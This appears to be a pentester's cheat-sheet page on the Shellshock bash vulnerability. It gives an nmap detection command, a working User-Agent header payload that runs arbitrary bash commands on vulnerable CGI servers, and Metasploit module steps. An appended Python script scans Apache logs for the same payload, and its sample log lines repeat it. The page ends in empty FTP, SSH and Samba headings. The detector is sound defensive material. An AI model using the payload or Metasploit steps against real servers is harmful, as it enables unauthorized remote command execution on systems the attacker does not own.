Linux
Shellshock vulnerability
PoC
https://github.com/opsxcq/exploit-CVE-2014-6271
nmap scan
nmap $IP --script=http-shellshock --script-args "http-shellshock.url=/path/file.cgi"
exploitation
User-Agent: () { :; }; echo; echo; /bin/bash -c 'type your cmd here'
metasploit
use exploit/multi/http/apache_mod_cgi_bash_env_exec
#options:
set RHOSTS $IP
set TARGETURL /path/to/file.cgi
exploit
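Added example (not part of the original notes): a log check for the request shown under exploitation. It scans Apache combined-format access log lines for the bash function-definition marker `() {` in the request line, Referer or User-Agent. The log lines, addresses and the name find_shellshock_probes are constructed for illustration.

```python
import re

# Apache "combined" format:
# host ident user [time] "request" status bytes "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)

# Marker of a bash function definition passed through an environment variable.
# Matched loosely (optional whitespace, anywhere in the field) so that
# malformed scanner probes are flagged as well.
FUNC_DEF_RE = re.compile(r'\(\s*\)\s*\{')

# Constructed sample log (documentation-range addresses, not real traffic).
SAMPLE_LOG = """
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)"
198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /path/file.cgi HTTP/1.1" 200 64 "-" "() { :; }; echo; echo; /bin/bash -c 'type your cmd here'"
198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /path/file.cgi HTTP/1.1" 500 0 "() { :; }; echo" "curl/7.0"
192.0.2.11 - - [01/Jan/2024:10:01:00 +0000] "GET /path/file.cgi?a=(1) HTTP/1.1" 200 20 "-" "Mozilla/5.0"
""".strip().splitlines()


def find_shellshock_probes(lines):
    """Return one record per log line whose logged fields carry the marker."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not combined format; skipped rather than guessed at
        for field in ("request", "referer", "agent"):
            if FUNC_DEF_RE.search(m.group(field)):
                hits.append({
                    "line": lineno,
                    "host": m["host"],
                    "field": field,
                    "status": int(m["status"]),
                    "request": m["request"],
                })
                break  # one record per line is enough for triage
    return hits


if __name__ == "__main__":
    for hit in find_shellshock_probes(SAMPLE_LOG):
        print(hit)
```

The combined format records only the Referer and User-Agent headers, so a marker sent in any other header will not appear in this log and needs a custom LogFormat or a proxy/WAF log to be seen.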
FTP
For FTP, you can refer to:
SSH
Refer to this page for SSH:
Samba
For Samba, refer to: